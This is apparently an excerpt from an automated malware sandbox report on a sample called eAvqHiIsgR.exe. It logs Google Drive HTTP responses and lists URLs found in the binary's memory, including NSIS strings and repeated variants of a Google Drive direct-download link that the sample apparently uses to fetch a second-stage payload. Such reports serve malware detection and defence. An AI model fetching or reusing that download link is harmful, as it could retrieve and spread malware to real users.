allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:47 GMTContent-Security-Policy: script-src 'nonce-HSHo8qZeZwI-myifIfl6-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC73LT_8RIbikhZ7aMiadkkYH_dbkzfuvlksbtgts_h_5wRkMowMV1a1kz-E6f8m-KirCUt8UG8o1wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-j7fetvVzqsPu9BS6yq2COg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6_3xX-Gvc5Btci_WjemGG-N6XqsJTeKUEdMi-CBxaFvhoN_sr15Cp3jiaOs_R-lmgTQHBxrc0dUgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:58 GMTContent-Security-Policy: script-src 'nonce-AwDv4fGpx1CodjAZxGju-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7lRDRY4LukXcieZVLZlEzHLEMOXx6s-vItBjhAUiSaRMO69b6s11pT1M4_d4axgBkRCYcW_P7rnAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:27:04 GMTContent-Security-Policy: script-src 'nonce-yB9yYCz8zb4cXKMSspmcuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4hHvH6RYzte-I48Xq0kC0xqUmDeVx-Pd46JFd10TRsgzJJ_UU3rOuX2e9hMfqCFNHEvLb0fqwJdQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: eAvqHiIsgR.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: eAvqHiIsgR.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/G
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Pbw
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/a
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download$Ny
Source: eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download1
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloade
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadszN
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadt
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/r
Source: eAvqHiIsgR.exe, 00000005.00000002.4542923885.0000000032A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4521588068.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69%9
Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM690
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM693J
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69F
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69KL?
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69Nk
Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69ib2
Source: eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69s
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.comZT
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/A
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/I
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/J
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3698690787.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3812944519.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download$N
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download1
Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadFb
Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadJb
